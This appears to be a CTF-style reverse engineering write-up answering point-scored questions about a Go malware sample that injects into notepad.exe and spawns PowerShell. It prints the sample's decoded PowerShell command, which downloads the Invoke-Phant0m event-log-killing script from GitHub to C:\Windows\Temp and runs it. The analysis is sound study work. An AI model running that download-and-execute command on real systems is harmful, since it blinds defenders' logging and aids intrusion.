Reverse Engineering - Another Injection
I ran the sample with the following tools active to get information about the sample for the following questions:
- FakeNet
- Process Monitor
- Process Explorer
-
What is the language the program is written? (1 points)
Running
stringson the binary shows that it is written in Go.Answer:
Golang -
What is the build id? (1 points)
Running
stringson the binary shows the textGo build ID: "eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq".Answer:
eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq -
What is the dependency package the sample uses for invoking windows APIs (1 points)
Uploading the sample to VirusTotal shows that it uses the
github.com/TheTitanrain/w32package.Answer:
github.com/TheTitanrain/w32 -
What is the victim process? (Hint: 32bit) (2 points)
Answer:
notepad.exe -
What is the process invoked from the shellcode? (1 points)
Answer:
powershell.exe -
What is the name of the created file? (2 points)
Command (in Linux):
strings main.exe | grep powershellCyberChef recipe:
From Base64~>Decode text (UTF-16LE)Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/master/Invoke-Phant0m.ps1" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;Answer:
C:\Windows\Temp\change.ps1 -
What is the name of the actual tool executed? (2 points)
Answer:
Invoke-Phant0m